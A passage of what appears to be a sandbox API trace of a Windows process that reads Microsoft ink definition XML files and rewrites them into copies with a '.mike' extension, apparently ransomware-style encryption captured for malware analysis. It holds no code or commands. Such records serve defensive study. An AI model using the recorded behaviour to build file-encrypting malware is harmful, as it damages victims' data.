lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.051] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.051] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x225acd0 | out: lpFileInformation=0x225acd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5a619a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5a619a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5a619a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2d60)) returned 1 [0046.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.051] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", dwFileAttributes=0x80) returned 0 [0046.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.052] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5a619a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5a619a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5a619a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2d60)) returned 1 [0046.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.052] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike")) returned 1 [0046.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.054] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.054] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.074] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.075] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.075] GetFileType (hFile=0x264) returned 0x1 [0046.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.075] GetFileType (hFile=0x264) returned 0x1 [0046.075] CloseHandle (hObject=0x264) returned 1 [0046.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.075] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.075] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), fInfoLevelId=0x0, lpFileInformation=0x225cf3c | out: lpFileInformation=0x225cf3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3)) returned 1 [0046.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.076] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), fInfoLevelId=0x0, lpFileInformation=0x225d294 | out: lpFileInformation=0x225d294*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3)) returned 1 [0046.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.076] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.077] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.077] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.077] GetFileType (hFile=0x264) returned 0x1 [0046.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.077] GetFileType (hFile=0x264) returned 0x1 [0046.077] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.077] WriteFile (in: hFile=0x264, lpBuffer=0x225e2b0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x225e2b0*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.078] CloseHandle (hObject=0x264) returned 1 [0046.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.081] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), fInfoLevelId=0x0, lpFileInformation=0x225dd50 | out: lpFileInformation=0x225dd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3)) returned 1 [0046.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.081] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.081] GetFileType (hFile=0x264) returned 0x1 [0046.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.081] GetFileType (hFile=0x264) returned 0x1 [0046.081] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.081] ReadFile (in: hFile=0x264, lpBuffer=0x225f3fc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x225f3fc*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0046.083] CloseHandle (hObject=0x264) returned 1 [0046.084] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.084] GetFileType (hFile=0x264) returned 0x1 [0046.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.084] GetFileType (hFile=0x264) returned 0x1 [0046.084] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.084] WriteFile (in: hFile=0x264, lpBuffer=0x2269964*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x2269964*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0046.085] CloseHandle (hObject=0x264) returned 1 [0046.086] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.086] GetFileType (hFile=0x264) returned 0x1 [0046.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.086] GetFileType (hFile=0x264) returned 0x1 [0046.086] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x2800 [0046.086] ReadFile (in: hFile=0x264, lpBuffer=0x226c408, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x226c408*, lpNumberOfBytesRead=0x2af038*=0x2c3, lpOverlapped=0x0) returned 1 [0046.086] CloseHandle (hObject=0x264) returned 1 [0046.087] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.087] GetFileType (hFile=0x264) returned 0x1 [0046.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.087] GetFileType (hFile=0x264) returned 0x1 [0046.087] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2a20 [0046.087] WriteFile (in: hFile=0x264, lpBuffer=0x22703a0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22703a0*, lpNumberOfBytesWritten=0x2af02c*=0x2d0, lpOverlapped=0x0) returned 1 [0046.087] CloseHandle (hObject=0x264) returned 1 [0046.088] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.088] GetFileType (hFile=0x264) returned 0x1 [0046.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.088] GetFileType (hFile=0x264) returned 0x1 [0046.089] WriteFile (in: hFile=0x264, lpBuffer=0x22735f0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22735f0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.089] CloseHandle (hObject=0x264) returned 1 [0046.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.090] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5aadc60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5aadc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ad3dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2cf0)) returned 1 [0046.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpFilePart=0x0) returned 0x55 [0046.091] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike", lpFilePart=0x0) returned 0x5a [0046.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.091] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2274e38 | out: 